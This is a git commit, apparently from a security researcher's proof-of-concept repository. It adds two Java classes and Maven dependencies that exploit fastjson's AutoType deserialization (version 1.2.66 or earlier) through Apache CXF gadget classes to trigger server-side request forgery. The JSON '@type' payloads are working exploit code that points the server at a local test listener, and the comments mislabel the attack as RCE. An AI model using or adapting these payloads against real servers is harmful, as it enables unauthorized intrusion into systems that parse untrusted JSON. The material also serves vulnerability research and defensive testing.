feat:添加两条Apache-Cxf的SSRF gadget

“threedr3am” · “threedr3am” · commit b1358044fc99 · 2020-03-03T15:52:44.000+08:00
diff --git a/fastjson/pom.xml b/fastjson/pom.xml
@@ -99,5 +99,16 @@
       <artifactId>cocoon-slide</artifactId>
       <version>2.1.11</version>
     </dependency>
+
+    <dependency>
+      <groupId>org.apache.cxf</groupId>
+      <artifactId>cxf-core</artifactId>
+      <version>3.3.5</version>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.cxf</groupId>
+      <artifactId>cxf-bundle</artifactId>
+      <version>2.7.18</version>
+    </dependency>
   </dependencies>
 </project>
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/ApacheCxfSSRFPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/ApacheCxfSSRFPoc.java
@@ -0,0 +1,40 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.HTTPServer;
+
+/**
+ * fastjson <= 1.2.66 RCE，需要开启AutoType
+ *
+ *
+ * <dependency>
+ *       <groupId>org.apache.cxf</groupId>
+ *       <artifactId>cxf-core</artifactId>
+ *       <version>3.3.5</version>
+ * </dependency>
+ * <dependency>
+ *       <groupId>org.apache.cxf</groupId>
+ *       <artifactId>cxf-bundle</artifactId>
+ *       <version>2.7.18</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class ApacheCxfSSRFPoc {
+
+  static {
+    HTTPServer.PORT = 23234;
+    HTTPServer.run(null);
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+    String payload = "{\"@type\":\"org.apache.cxf.jaxrs.model.wadl.WadlGenerator\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
+    try {
+      JSON.parse(payload);
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/ApacheCxfSSRFPoc2.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/ApacheCxfSSRFPoc2.java
@@ -0,0 +1,40 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.HTTPServer;
+
+/**
+ * fastjson <= 1.2.66 RCE，需要开启AutoType
+ *
+ *
+ * <dependency>
+ *       <groupId>org.apache.cxf</groupId>
+ *       <artifactId>cxf-core</artifactId>
+ *       <version>3.3.5</version>
+ * </dependency>
+ * <dependency>
+ *       <groupId>org.apache.cxf</groupId>
+ *       <artifactId>cxf-bundle</artifactId>
+ *       <version>2.7.18</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class ApacheCxfSSRFPoc2 {
+
+  static {
+    HTTPServer.PORT = 23234;
+    HTTPServer.run(null);
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+    String payload = "{\"@type\":\"org.apache.cxf.jaxrs.utils.schemas.SchemaHandler\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
+    try {
+      JSON.parse(payload);
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}
